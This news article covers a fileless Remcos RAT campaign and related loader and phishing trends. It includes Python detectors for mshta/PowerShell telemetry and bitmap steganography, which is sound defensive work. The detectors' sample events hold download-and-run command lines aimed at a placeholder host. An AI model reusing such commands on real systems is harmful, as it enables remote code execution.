
Fileless Remcos RAT Malware Bypasses Traditional Security


A stealthy new malware campaign is exploiting PowerShell-based loaders and LNK files to deploy Remcos RAT malware, giving attackers full remote access to compromised Windows systems. Researchers at Qualys have detailed the sophisticated attack chain, which starts with a simple ZIP archive and ends with complete system control.

The attackers are distributing malicious LNK files disguised as tax-related documents inside ZIP archives. Once a user opens the shortcut file, it triggers mshta.exe, a legitimate Windows tool used to execute HTML Applications (HTA). This launches an obfuscated remote file named xlab22.hta, which contains Visual Basic Script designed to fetch additional payloads—including another HTA file and a PowerShell script.

The PowerShell script reconstructs a shellcode loader directly in memory, which then deploys the Remcos RAT payload—without ever touching the disk.

Fileless Malware: Inside the Remcos Attack Chain

This campaign is part of a growing trend of fileless malware, where attackers avoid writing to disk and instead operate entirely in system memory to avoid detection. Once launched, the Remcos RAT malware grants full control over the infected machine. It can log keystrokes, capture screenshots, record clipboard activity, list running processes, and even exfiltrate data to its command-and-control server (readysteaurants[.]com) using encrypted TLS connections.

The malware also achieves persistence by modifying Windows Registry keys to launch itself at startup via the 311.hta file—one of the second-stage payloads downloaded early in the attack.

Remcos, compiled as a 32-bit binary in Visual Studio C++, is popular among cybercriminals due to its lightweight footprint, robust spying features, and flexibility. This isn’t the first time it has appeared in a fileless form: Fortinet previously spotted similar behavior in a phishing campaign in November 2024 that used fake order confirmations to lure victims.

By using legitimate tools like mshta.exe and PowerShell, threat actors bypass antivirus and endpoint detection systems. “This fileless malware operates directly in memory, using LNK files and MSHTA.exe to execute obfuscated PowerShell scripts that can bypass conventional defenses,” said SlashNext CTO J. Stephen Kowski. He stressed the need for advanced email security to detect malicious LNK attachments and real-time PowerShell monitoring.
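The chain described above (LNK shortcut, then mshta.exe fetching a remote HTA, then PowerShell spawned by mshta.exe, then a Run-key entry pointing at an .hta file) is the kind of sequence that endpoint telemetry can catch even when nothing malicious ever lands on disk. The following is an added example, not code from Qualys or the article: a small Python detector run over constructed process-creation and registry events in a Sysmon-like shape. The field names, the `example.invalid` host, the Base64 placeholder and the Run-key value name are assumptions of this example; the only page-sourced details are the mshta.exe/PowerShell pairing and the 311.hta persistence.

```python
import re

# Constructed sample telemetry in a Sysmon-like shape. Field names and
# values are assumptions of this example, not real logs from the campaign.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\explorer.exe", "parent": "",
     "cmdline": "explorer.exe"},
    # User double-clicks the LNK; Explorer launches mshta.exe with a remote HTA.
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://example.invalid/xlab22.hta"},   # constructed host
    # The HTA's script host spawns PowerShell (encoded argument is a placeholder).
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc BASE64PLACEHOLDER"},
    # Persistence: a Run key value that re-launches the second-stage HTA at logon.
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"mshta.exe C:\Users\Public\311.hta"},
    # A local HTA started by a service: not matched by the remote-URL rule.
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (empty string stays empty)."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_process(evt: dict) -> list[str]:
    """Rules for a process-creation event; returns the names of matched rules."""
    image = basename(evt["image"])
    parent = basename(evt["parent"])
    cmd = evt["cmdline"]
    findings = []
    # mshta.exe pulling an HTA from a URL is a classic LOLBin download-and-run.
    if image == "mshta.exe" and URL_RE.search(cmd):
        findings.append("mshta_remote_hta")
    # PowerShell whose parent is a script host points at an HTA/VBScript stage
    # handing off to an in-memory loader.
    if image in ("powershell.exe", "pwsh.exe") and parent in SCRIPT_HOSTS:
        findings.append("powershell_spawned_by_script_host")
    return findings


def detect_registry(evt: dict) -> list[str]:
    """Rules for a registry value-set event under the autostart Run keys."""
    data = evt["data"].lower()
    if RUN_KEY_RE.search(evt["key"]) and ("mshta" in data or data.endswith(".hta")):
        return ["run_key_hta_persistence"]
    return []


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Return (event_index, rule_name) pairs for every rule that fired."""
    alerts = []
    for index, evt in enumerate(events):
        rule = detect_process if evt["type"] == "process" else detect_registry
        for name in rule(evt):
            alerts.append((index, name))
    return alerts


if __name__ == "__main__":
    for index, name in scan(SAMPLE_EVENTS):
        print(f"event {index}: {name}")
```

Each rule alone is noisy in a large estate (legitimate installers use mshta.exe, and Run keys are common), so in practice the parent/child pairing and the Run-key rule are best correlated on the same host within a short window, which is what makes the sequence above distinctive rather than any single event.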

Broader Surge in Loader Malware, Credential Theft, and AI-Powered Phishing

The Remcos campaign isn’t operating in isolation. New research from Palo Alto Networks Unit 42 and Threatray has uncovered a multi-stage .NET-based loader that’s being used to launch other common malware strains like Agent Tesla, NovaStealer, VIPKeylogger, XLoader, and XWorm.

These loaders use encrypted .NET DLLs and steganographic techniques—such as hiding payloads in bitmap images—to evade detection. Once decrypted, these payloads execute in memory just like Remcos, reinforcing a broader trend of fileless delivery mechanisms designed to circumvent traditional defenses.
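Hiding an encrypted payload inside a bitmap defeats signature scanning of the carrier, but the carrier itself often betrays the trick: the bytes appended after the declared pixel data, a file size that disagrees with the header, or pixel data with near-random entropy. The following is an added example, not code from Unit 42, Threatray or the article: a Python inspector that parses the BMP file and DIB headers, compares the declared size with the actual size, measures the entropy of the pixel area, and flags the image. The threshold values, the `build_bmp` helper that constructs the test images and the `PAYLOAD_PLACEHOLDER` bytes are assumptions of this example; the entropy rule is a heuristic (photographic content can also score high) and is only applied to images large enough for the measure to be meaningful.

```python
import math
import struct
from collections import Counter


def build_bmp(width: int, height: int, pixels: bytes, trailing: bytes = b"") -> bytes:
    """Construct a minimal 24-bit BMP for testing, optionally with bytes appended
    after the pixel data (the 'hidden payload' case). Test helper, not a real image."""
    row_size = (width * 3 + 3) & ~3            # rows are padded to 4 bytes
    expected = row_size * height
    if len(pixels) != expected:
        raise ValueError(f"need {expected} pixel bytes, got {len(pixels)}")
    # BITMAPINFOHEADER: size, width, height, planes, bpp, compression,
    # image size, x/y pixels per metre, colours used, important colours
    dib = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, expected,
                      2835, 2835, 0, 0)
    off_bits = 14 + len(dib)
    declared_size = off_bits + expected         # header deliberately ignores 'trailing'
    header = struct.pack("<2sIHHI", b"BM", declared_size, 0, 0, off_bits)
    return header + dib + pixels + trailing


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0.0 for constant data, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def inspect_bmp(blob: bytes, entropy_threshold: float = 7.2,
                min_pixels_for_entropy: int = 1024) -> dict:
    """Parse the BMP headers and report structural oddities that suggest a
    payload is riding inside or behind the image."""
    if len(blob) < 54 or blob[:2] != b"BM":
        raise ValueError("not a BMP file")
    _, declared_size, _, _, off_bits = struct.unpack("<2sIHHI", blob[:14])
    width, height, _, bpp = struct.unpack("<iiHH", blob[18:30])
    row_size = (width * bpp // 8 + 3) & ~3
    pixel_len = row_size * abs(height)          # negative height = top-down rows
    pixels = blob[off_bits:off_bits + pixel_len]
    trailing = max(0, len(blob) - (off_bits + pixel_len))
    entropy = shannon_entropy(pixels)

    reasons = []
    if trailing > 0:
        reasons.append("trailing_data")          # bytes after the last pixel row
    if declared_size != len(blob):
        reasons.append("size_mismatch")          # header disagrees with file length
    if len(pixels) >= min_pixels_for_entropy and entropy > entropy_threshold:
        reasons.append("high_entropy_pixels")    # heuristic: encrypted blob as pixels
    return {
        "width": width, "height": height, "bpp": bpp,
        "declared_size": declared_size, "actual_size": len(blob),
        "trailing_bytes": trailing, "pixel_entropy": entropy,
        "suspicious": bool(reasons), "reasons": reasons,
    }


if __name__ == "__main__":
    clean = build_bmp(2, 2, bytes(16))
    carrier = build_bmp(2, 2, bytes(16), trailing=b"PAYLOAD_PLACEHOLDER" * 4)
    for name, image in (("clean", clean), ("carrier", carrier)):
        print(name, inspect_bmp(image))
```

The trailing-data and size checks are exact and cheap enough to run on every image pulled from mail or web proxies; the entropy score is a tie-breaker rather than a verdict, and it will miss least-significant-bit embedding, which leaves file size untouched and barely moves the entropy of the pixel area.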

Meanwhile, attackers are getting more creative with phishing lures. Recent tactics include:

  • KeeLoader, a trojanized KeePass installer hosted on typosquat domains, used to steal admin credentials and deploy Cobalt Strike beacons.
  • ClickFix lures embedded in PDFs that lead to Lumma Stealer payloads through multiple dropper URLs.
  • Formbook info-stealers delivered via Microsoft Office documents wrapped with Horus Protector malware.
  • Phishing via blob URIs, leveraging trusted domains like onedrive.live.com to redirect victims to malicious HTML pages.
  • RAR archives masquerading as software installers, used to distribute NetSupport RAT in attacks targeting Ukraine and Poland.
  • Telegram bot-enabled credential theft, where HTML email attachments harvest Gmail, Hotmail, and Outlook credentials and exfiltrate them to a bot dubbed “Blessed logs”, active since February 2025.

Adding to the complexity, attackers are now using AI-powered polymorphic campaigns that change email subject lines, body content, and sender names in real-time to bypass static email filters. These AI-generated messages adapt on the fly, defeating perimeter-based defenses and requiring post-delivery threat detection to contain the damage.

“AI has given threat actors the tools to automate malware development and personalize phishing attacks with alarming precision,” said researchers at Cofense. “Traditional email filters are no longer enough—organizations need solutions that monitor user inboxes in real time and detect threats after delivery.”

As campaigns like the Remcos RAT malware operation evolve, defenders must prepare for multi-layered threats that blend social engineering, fileless malware, and adaptive phishing—all within a single, seamless attack.
